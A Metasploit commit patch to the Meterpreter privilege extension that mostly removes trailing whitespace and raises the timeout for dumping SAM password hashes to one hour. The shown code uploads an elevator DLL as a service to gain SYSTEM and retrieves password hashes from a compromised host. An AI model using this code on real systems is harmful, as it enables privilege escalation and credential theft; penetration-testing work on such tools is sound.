From 87379e798a04027c245b04cd1fa4288515b8e556 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Tue, 1 Jun 2010 16:45:34 +0000
Subject: [PATCH] Bump the timeout for hashdump, handle large DCs better,
 thanks Chris!

git-svn-id: file:///home/svn/framework3/trunk@9385 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../post/meterpreter/extensions/priv/priv.rb  | 37 ++++++++++---------
 1 file changed, 19 insertions(+), 18 deletions(-)

diff --git a/lib/rex/post/meterpreter/extensions/priv/priv.rb b/lib/rex/post/meterpreter/extensions/priv/priv.rb
index ed1d5e7393..4c4c9e3a00 100644
--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -24,10 +24,10 @@ class Priv < Extension
 	#
 	def initialize(client)
 		super(client, 'priv')
-		
+
 		client.register_extension_aliases(
 			[
-				{ 
+				{
 					'name' => 'priv',
 					'ext'  => self
 				},
@@ -36,25 +36,25 @@ class Priv < Extension
 		# Initialize sub-classes
 		self.fs = Fs.new(client)
 	end
-	
+
 	#
 	# Attempt to elevate the meterpreter to Local SYSTEM
 	#
 	def getsystem( technique=0 )
 		request = Packet.create_request( 'priv_elevate_getsystem' )
-		
-		elevator_name = Rex::Text.rand_text_alpha_lower( 6 ) 
-		
+
+		elevator_name = Rex::Text.rand_text_alpha_lower( 6 )
+
 		if( client.platform == 'x64/win64' )
 			elevator_path = ::File.join( Msf::Config.install_root, "data", "meterpreter", "elevator.x64.dll" )
 		else
 			elevator_path = ::File.join( Msf::Config.install_root, "data", "meterpreter", "elevator.dll" )
 		end
-		
+
 		elevator_path = ::File.expand_path( elevator_path )
-		
+
 		elevator_data = ""
-		
+
 		::File.open( elevator_path, "rb" ) { |f|
 			elevator_data += f.read( f.stat.size )
 		}
@@ -63,29 +63,29 @@ class Priv < Extension
 		request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name )
 		request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data )
 		request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length )
-		
+
 		# as some service routines can be slow we bump up the timeout to 90 seconds
 		response = client.send_request( request, 90 )
-		
+
 		technique = response.get_tlv_value( TLV_TYPE_ELEVATE_TECHNIQUE )
-		
+
 		if( response.result == 0 and technique != nil )
 			client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
 			client.sys.config.getprivs
 			return [ true, technique ]
 		end
-		
+
 		return [ false, 0 ]
 	end
-	
+
 	#
 	# Returns an array of SAM hashes from the remote machine.
 	#
 	def sam_hashes
-		response = client.send_request(
-			Packet.create_request('priv_passwd_get_sam_hashes'))
+		# This can take a long long time for large domain controls, bump the timeout to one hour
+		response = client.send_request(Packet.create_request('priv_passwd_get_sam_hashes'), 3600)
 
-		response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash| 
+		response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash|
 			SamUser.new(hash)
 		}
 	end
@@ -101,4 +101,5 @@ protected
 
 end
 
-end; end; end; end; end
\ No newline at end of file
+end; end; end; end; end
+